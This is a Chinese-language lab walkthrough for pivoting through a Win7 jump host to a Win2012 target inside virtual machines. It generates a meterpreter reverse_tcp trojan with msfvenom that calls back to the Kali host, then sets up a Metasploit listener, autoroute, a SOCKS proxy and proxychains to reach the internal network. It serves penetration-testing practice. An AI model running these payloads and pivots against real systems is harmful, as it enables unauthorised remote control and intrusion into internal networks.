一些前缀准备
1、需要四台虚拟机---win10(作为本地主机)、kali(作为vps)、win7(作为跳板)、win2012(作为目标机)
2、我们需要模拟内网主机,需要配置一下虚拟机网卡,让他不出网
编辑---->虚拟网络编辑器---->添加网络
DHCP设置
这里的范围随意
3、所有的主机都使用NAT模式
4、跳板机需要两张网卡(一张出网(NAT)、一张当内网(12.12.12.0网段的))
5、目标机使用小皮面板开个http服务
搭建隧道代理
win7是代理,访问kali自己的1080相当于让win7帮我们访问目标机的80端口
kali生成木马用于连接跳板机win7
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.250.129 LPORT=7777 -f exe > kali.exe
kali开启监听
msfconsole
set payload windows/meterpreter/reverse_tcp
set lhost eth0
set lport 7777
run上线木马
将木马放到win7中运行
配置win7的路由
保证win7能通win2012
run autoroute -p
run autoroute -s 12.12.12.0/24
run autoroute -p
bg
route printkali开启隧道
use auxiliary/server/socks_proxy
set version 4a
runvim /etc/proxychains4.conf
socks4 192.168.250.129 1080kali访问目标机
proxychains nmap -sT 12.12.12.18 -p 80 或者
proxychains firefox 12.12.12.18
如果浏览器访问不了,那能探测到80端口的开放就可以了
通过win10访问目标主机
开启全局代理让所有流量指向kali机
下载SocksCap(下载exe就好)
https://github.com/bobo2334/sockscap64/releases
安装时遇到这个选否
运行exe
本地使用burp抓包
抓包配置
完成